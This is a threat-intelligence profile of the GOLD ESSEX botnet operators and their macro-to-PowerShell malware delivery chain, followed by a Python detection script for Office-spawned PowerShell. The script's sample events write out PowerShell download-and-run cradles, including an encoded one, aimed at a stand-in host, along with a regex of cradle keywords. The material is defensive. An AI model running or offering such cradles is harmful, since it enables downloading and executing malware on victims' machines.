GOLD ESSEX
SUMMARY
GOLD ESSEX is a financially motivated cybercriminal threat group assessed with high confidence to operate the Pushdo and Cutwail botnets. Different threat groups have used various versions of the Cutwail malware to assemble multiple botnets since 2007. The only remaining active Cutwail botnet, frequently referred to as Cutwail version 2, is distributed by the Pushdo malware. In addition to downloading Cutwail, Pushdo may retrieve information-stealing malware such as Pony.

Cutwail uses an expressive template language that lets individual bots generate highly varied spam emails from instructions received from command and control (C2) servers. These emails are sent on behalf of GOLD ESSEX's customers and frequently carry malware attachments or links to phishing pages. Japanese-language phishing lures regularly target credentials for popular brands such as Apple, Amazon, and Rakuten. Malware payloads are typically Office documents with embedded macros that execute PowerShell-based downloaders, which in turn retrieve malware such as Gozi ISFB (Ursnif), Dridex (Bugat v5), or URLZone (Bebloh). Since March 2020, Cutwail has regularly distributed English-language spam emails intended to deliver the Dridex malware associated with botnet segment 10444.
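The delivery chain described above (Office document with a macro that launches a PowerShell downloader) leaves a distinctive process-creation footprint: an Office application as the parent of powershell.exe, usually with a hidden window, an encoded command, or a download cradle on the command line. The following is an added detection example written for this page; it is not code from the original profile or from any vendor product. It runs over a handful of constructed Sysmon-style process-creation events (all field values, paths and the `example.invalid` URLs are made up), decodes any `-EncodedCommand` payload, and reports which events match and why.

```python
import base64
import re

# Office binaries that a macro-driven downloader would run from (assumption:
# these are the common interactive Office parents; extend for other hosts).
OFFICE_PARENTS = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe"}
POWERSHELL_CHILDREN = {"powershell.exe", "pwsh.exe"}

# Strings typical of PowerShell download cradles. Checked case-insensitively
# against both the raw command line and any decoded -EncodedCommand payload.
CRADLE_PATTERNS = re.compile(
    r"downloadstring|downloadfile|invoke-webrequest|\biwr\b|start-bitstransfer"
    r"|net\.webclient|invoke-expression|\biex\b",
    re.I,
)
HIDDEN_WINDOW = re.compile(r"-w(?:indowstyle)?\s+hidden", re.I)
ENCODED_ARG = re.compile(r"-(?:e|ec|enc|encodedcommand)\s+([A-Za-z0-9+/=]+)", re.I)

# Constructed sample payload for the encoded-command case (PowerShell expects
# UTF-16LE before base64 encoding). Hostnames are hypothetical.
_ENCODED = base64.b64encode(
    "(New-Object Net.WebClient).DownloadFile('http://example.invalid/x.exe',"
    "\"$env:TEMP\\x.exe\")".encode("utf-16-le")
).decode()

# Constructed sample events in the shape of Sysmon Event ID 1 fields.
# These are not real telemetry.
SAMPLE_EVENTS = [
    {"ParentImage": r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE",
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": "powershell.exe -nop -w hidden -c \"IEX (New-Object Net.WebClient)"
                    ".DownloadString('http://example.invalid/a.ps1')\""},
    {"ParentImage": r"C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE",
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": f"powershell.exe -NoP -NonI -W Hidden -Enc {_ENCODED}"},
    {"ParentImage": r"C:\Windows\explorer.exe",  # benign: admin opening a console
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": "powershell.exe -ep bypass -c Get-Date"},
    {"ParentImage": r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE",
     "Image": r"C:\Windows\splwow64.exe",  # benign: Word printing
     "CommandLine": "splwow64.exe 12288"},
]


def basename(path):
    """Return the lowercase file name of a Windows or POSIX path."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def decode_encoded_command(cmdline):
    """Return the decoded -EncodedCommand payload, or None if absent/invalid."""
    m = ENCODED_ARG.search(cmdline)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1)).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None


def analyze_event(event):
    """Return a hit dict for an Office-spawned PowerShell event, else None."""
    parent = basename(event.get("ParentImage", ""))
    child = basename(event.get("Image", ""))
    cmd = event.get("CommandLine", "")
    if parent not in OFFICE_PARENTS or child not in POWERSHELL_CHILDREN:
        return None
    decoded = decode_encoded_command(cmd)
    reasons = ["office_parent_spawns_powershell"]
    if HIDDEN_WINDOW.search(cmd):
        reasons.append("hidden_window")
    if decoded is not None:
        reasons.append("encoded_command")
    if CRADLE_PATTERNS.search(cmd) or (decoded and CRADLE_PATTERNS.search(decoded)):
        reasons.append("download_cradle")
    return {"parent": parent, "child": child, "reasons": reasons, "decoded": decoded}


def scan(events):
    """Run analyze_event over a sequence of events and collect the hits."""
    return [hit for hit in (analyze_event(e) for e in events) if hit]


if __name__ == "__main__":
    for hit in scan(SAMPLE_EVENTS):
        print(hit["parent"], "->", hit["child"], ", ".join(hit["reasons"]))
        if hit["decoded"]:
            print("  decoded:", hit["decoded"])
```

The parent/child pairing alone is a reasonable alert in most environments, since Office rarely has a legitimate reason to start PowerShell; the hidden-window, encoded-command and cradle indicators are there to raise severity and to surface the decoded download URL for the responder. Feeding real Sysmon or EDR process events into `scan` only requires mapping their field names onto `ParentImage`, `Image` and `CommandLine`.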